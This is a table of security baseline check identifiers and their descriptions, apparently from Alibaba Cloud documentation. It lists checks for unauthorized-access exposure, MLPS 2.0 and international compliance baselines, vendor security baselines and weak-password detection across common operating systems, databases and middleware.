hc_exploit_docker | Important threat exploit: Unauthorized access to Docker | |
hc_exploit_es | Important threat exploit: Unauthorized access to Elasticsearch | |
hc_exploit_hadoop | Important threat exploit: Unauthorized access to Hadoop | |
hc_exploit_jboss | Important threat exploit: Unauthorized access to JBoss | |
hc_exploit_jenkins | Important threat exploit: Unauthorized access to Jenkins | |
hc_exploit_k8s_api | Important threat exploit: Unauthorized access to Kubernetes API server | |
hc_exploit_ldap | Important threat exploit: Unauthorized access to LDAP (Windows environment) | |
hc_exploit_ldap_linux | Important threat exploit: Unauthorized access to OpenLDAP (Linux environment) | |
hc_exploit_memcache | Important threat exploit: Unauthorized access to Memcached | |
hc_exploit_mongo | Important threat exploit: Unauthorized access to MongoDB | |
hc_exploit_pgsql | Important: Threat Exploitation—PostgreSQL Unauthorized Access Baseline | |
hc_exploit_rabbitmq | Important threat exploit: Unauthorized access to RabbitMQ | |
hc_exploit_rsync | Important threat exploit: Unauthorized access to rsync | |
hc_exploit_tomcat | Important threat exploit: Apache Tomcat AJP file inclusion vulnerability | |
hc_exploit_zookeeper | Important threat exploit: Unauthorized access to ZooKeeper | |
hc_container | hc_docker | Alibaba Cloud standard: Docker security baseline check |
hc_middleware_ack_master | International security best practices: Kubernetes (ACK) master node security baseline check | |
hc_middleware_ack_node | International security best practices: Kubernetes (ACK) node security baseline check | |
hc_middleware_k8s | Alibaba Cloud standard: Kubernetes master node security baseline check | |
hc_middleware_k8s_node | Alibaba Cloud standard: Kubernetes node security baseline check | |
cis | hc_suse 15_djbh | MLPS 2.0 Level 3: SUSE 15 compliance baseline check |
hc_aliyun_linux3_djbh_l3 | MLPS 2.0 Level 3: Alibaba Cloud Linux 3 compliance baseline check | |
hc_aliyun_linux_djbh_l3 | MLPS 2.0 Level 3: Alibaba Cloud Linux/Aliyun Linux 2 compliance baseline check | |
hc_bind_djbh | MLPS 2.0 Level 3: Bind compliance baseline check | |
hc_centos 6_djbh_l3 | MLPS 2.0 Level 3: CentOS Linux 6 compliance baseline check | |
hc_centos 7_djbh_l3 | MLPS 2.0 Level 3: CentOS Linux 7 compliance baseline check | |
hc_centos 8_djbh_l3 | MLPS 2.0 Level 3: CentOS Linux 8 compliance baseline check | |
hc_debian_djbh_l3 | MLPS 2.0 Level 3: Debian Linux 8/9/10 compliance baseline check | |
hc_iis_djbh | MLPS 2.0 Level 3: IIS compliance baseline check | |
hc_informix_djbh | MLPS 2.0 Level 3: Informix compliance baseline check | |
hc_jboss_djbh | MLPS 2.0 Level 3: JBoss compliance baseline check | |
hc_mongo_djbh | MLPS 2.0 Level 3: MongoDB compliance baseline check | |
hc_mssql_djbh | MLPS 2.0 Level 3: SQL Server compliance baseline check | |
hc_mysql_djbh | MLPS 2.0 Level 3: MySQL compliance baseline check | |
hc_nginx_djbh | MLPS 2.0 Level 3: Nginx compliance baseline check | |
hc_oracle_djbh | MLPS 2.0 Level 3: Oracle compliance baseline check | |
hc_pgsql_djbh | MLPS 2.0 Level 3: PostgreSQL compliance baseline check | |
hc_redhat 6_djbh_l3 | MLPS 2.0 Level 3: Red Hat Linux 6 compliance baseline check | |
hc_redhat_djbh_l3 | MLPS 2.0 Level 3: Red Hat Linux 7 compliance baseline check | |
hc_redis_djbh | MLPS 2.0 Level 3: Redis compliance baseline check | |
hc_suse 10_djbh_l3 | MLPS 2.0 Level 3: SUSE 10 compliance baseline check | |
hc_suse 12_djbh_l3 | MLPS 2.0 Level 3: SUSE 12 compliance baseline check | |
hc_suse_djbh_l3 | MLPS 2.0 Level 3: SUSE 11 compliance baseline check | |
hc_ubuntu 14_djbh_l3 | MLPS 2.0 Level 3: Ubuntu 14 compliance baseline check | |
hc_ubuntu_djbh_l3 | MLPS 2.0 Level 3: Ubuntu 16/18/20 compliance baseline check | |
hc_was_djbh | MLPS 2.0 Level 3: Websphere Application Server compliance baseline check | |
hc_weblogic_djbh | MLPS 2.0 Level 3: WebLogic compliance baseline check | |
hc_win 2008_djbh_l3 | MLPS 2.0 Level 3: Windows 2008 R2 compliance baseline check | |
hc_win 2012_djbh_l3 | MLPS 2.0 Level 3: Windows 2012 R2 compliance baseline check | |
hc_win 2016_djbh_l3 | MLPS 2.0 Level 3: Windows 2016/2019 compliance baseline check | |
hc_aliyun_linux_djbh_l2 | MLPS 2.0 Level 2: Alibaba Cloud Linux/Aliyun Linux 2 compliance baseline check | |
hc_centos 6_djbh_l2 | MLPS 2.0 Level 2: CentOS Linux 6 compliance baseline check | |
hc_centos 7_djbh_l2 | MLPS 2.0 Level 2: CentOS Linux 7 compliance baseline check | |
hc_debian_djbh_l2 | MLPS 2.0 Level 2: Debian Linux 8 compliance baseline check | |
hc_redhat 7_djbh_l2 | MLPS 2.0 Level 2: Red Hat Linux 7 compliance baseline check | |
hc_ubuntu_djbh_l2 | MLPS 2.0 Level 2: Ubuntu 16/18 compliance baseline check | |
hc_win 2008_djbh_l2 | MLPS 2.0 Level 2: Windows 2008 R2 compliance baseline check | |
hc_win 2012_djbh_l2 | MLPS 2.0 Level 2: Windows 2012 R2 compliance baseline check | |
hc_win 2016_djbh_l2 | MLPS 2.0 Level 2: Windows 2016/2019 compliance baseline check | |
hc_aliyun_linux_cis | International security best practices: Alibaba Cloud Linux/Aliyun Linux 2 security baseline check | |
hc_centos 6_cis_rules | International security best practices: CentOS Linux 6 security baseline check | |
hc_centos 7_cis_rules | International security best practices: CentOS Linux 7 security baseline check | |
hc_centos 8_cis_rules | International security best practices: CentOS Linux 8 security baseline check | |
hc_debian 8_cis_rules | International security best practices: Debian Linux 8 security baseline check | |
hc_ubuntu 14_cis_rules | International security best practices: Ubuntu 14 security baseline check | |
hc_ubuntu 16_cis_rules | International security best practices: Ubuntu 16/18/20 security baseline check | |
hc_win 2008_cis_rules | International security best practices: Windows Server 2008 R2 security baseline check | |
hc_win 2012_cis_rules | International security best practices: Windows Server 2012 R2 security baseline check | |
hc_win 2016_cis_rules | International security best practices: Windows Server 2016/2019 R2 security baseline check | |
hc_kylin_djbh_l3 | MLPS 2.0 Level 3: Kylin compliance baseline check | |
hc_uos_djbh_l3 | MLPS 2.0 Level 3: UOS compliance baseline check | |
hc_best_security | hc_aliyun_linux | Alibaba Cloud standard: Alibaba Cloud Linux/Aliyun Linux 2 security baseline check |
hc_centos 6 | Alibaba Cloud standard: CentOS Linux 6 security baseline check | |
hc_centos 7 | Alibaba Cloud standard: CentOS Linux 7/8 security baseline check | |
hc_debian | Alibaba Cloud standard: Debian Linux 8/9/10 security baseline check | |
hc_redhat 6 | Alibaba Cloud standard: Red Hat Linux 6 security baseline check | |
hc_redhat 7 | Alibaba Cloud standard: Red Hat Linux 7/8 security baseline check | |
hc_ubuntu | Alibaba Cloud standard: Ubuntu security baseline check | |
hc_windows_2008 | Alibaba Cloud standard: Windows 2008 R2 security baseline check | |
hc_windows_2012 | Alibaba Cloud standard: Windows 2012 R2 security baseline check | |
hc_windows_2016 | Alibaba Cloud standard: Windows 2016/2019 security baseline check | |
hc_db_mssql | Alibaba Cloud standard: SQL Server security baseline check | |
hc_memcached_ali | Alibaba Cloud standard: Memcached security baseline check | |
hc_mongodb | Alibaba Cloud standard: MongoDB 3.x security baseline check | |
hc_mysql_ali | Alibaba Cloud standard: MySQL security baseline check | |
hc_oracle | Alibaba Cloud standard: Oracle 11g security baseline check | |
hc_pgsql_ali | Alibaba Cloud standard: PostgreSQL security baseline check | |
hc_redis_ali | Alibaba Cloud standard: Redis security baseline check | |
hc_apache | Alibaba Cloud standard: Apache security baseline check | |
hc_iis_8 | Alibaba Cloud standard: IIS 8 security baseline check | |
hc_nginx_linux | Alibaba Cloud standard: Nginx security baseline check | |
hc_suse 15 | Alibaba Cloud standard: SUSE Linux 15 security baseline check | |
tomcat 7 | Alibaba Cloud standard: Apache Tomcat security baseline check | |
weak_password | hc_mongodb_pwd | Weak password: MongoDB logon weak password detection (supports version 2.x) |
hc_weakpwd_ftp_linux | Weak password: FTP logon weak password check | |
hc_weakpwd_linux_sys | Weak password: Linux system logon weak password check | |
hc_weakpwd_mongodb 3 | Weak password: MongoDB logon weak password detection | |
hc_weakpwd_mssql | Weak password: SQL Server database logon weak password check | |
hc_weakpwd_mysql_linux | Weak password: MySQL database logon weak password check | |
hc_weakpwd_mysql_win | Weak password: MySQL database logon weak password check (Windows) | |
hc_weakpwd_openldap | Weak password: OpenLDAP logon weak password check | |
hc_weakpwd_oracle | Weak password: Oracle logon weak password detection | |
hc_weakpwd_pgsql | Weak password: PostgreSQL database logon weak password check | |
hc_weakpwd_pptp | Weak password: pptpd service logon weak password check | |
hc_weakpwd_redis_linux | Weak password: Redis database logon weak password check | |
hc_weakpwd_rsync | Weak password: rsync service logon weak password check | |
hc_weakpwd_svn | Weak password: SVN service logon weak password check | |
hc_weakpwd_tomcat_linux | Weak password: Apache Tomcat console weak password check | |
hc_weakpwd_vnc | Weak password: VNC Server weak password check | |
hc_weakpwd_weblogic | Weak password: WebLogic 12c logon weak password detection | |
hc_weakpwd_win_sys | Weak password: Windows system logon weak password check |